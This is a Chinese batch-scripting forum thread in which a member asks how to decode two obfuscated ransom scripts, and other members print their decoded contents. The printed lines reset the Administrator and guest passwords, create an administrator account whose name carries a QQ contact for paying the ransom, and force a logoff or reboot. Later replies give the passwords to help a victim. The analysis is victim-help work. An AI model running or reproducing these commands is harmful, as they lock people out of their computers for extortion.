[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖

[其他] [已解决]这两种批处理怎么解密

看过论坛里的帖子,知道文件头混淆加密的用copy nul+a.bat b.bat,用QBFC转成exe的用od设断点看路径,但是这两个批处理不会解。。。
上传附件了,注意!!!!!!这两个是别人发的敲竹杠,谨慎运行

看到名字就知道是病毒了
batgame.com ----- bat吧 (百度贴吧) 里的一个坑爹 病毒 作品

TOP

c:bat
  1. echo \xEF\x7E\x70\xC7\xCC\x3F\xE9\x56\x38...
  2. net user Administrator zfw123
  3. net user 要密码加QQ1845016856 zfw123 /add
  4. Shutdown -L
  5. echo \xEF\x7E\x70\xC7\xCC\x3F\xE9\x56\x38...
复制代码

TOP

com文件直接rar打开
然而并没有加密,仅仅是混淆,73-75行为勒索代码

TOP

回复 4# 老刘1号


    能不能详细说说

TOP

本帖最后由 见与不见 于 2017-10-12 23:56 编辑

xx.COM里面是upx壳的命令行程序,解密:
  1. ECHO OFF
  2. net user Administrator CNM5418
  3. net user guest CNM5418
  4. net user 要密码加QQ1982949259 CNM5418 /add
  5. net localgroup administrators 要密码加QQ1982949259 /add
  6. shutdown -f -r -t 0
复制代码
bat脚本上面有已经给你解密了。


解密方法(鼠标戳一下)
2

评分人数

TOP

回复 6# 见与不见


    谢谢你!

TOP

回复 1# Blitz


    能说下密码吗?手贱点开了

TOP

回复 8# 1055367558


    密码在回帖里面都有

TOP

回复 9# 见与不见


    zfw123   或  CNM5418

TOP

返回列表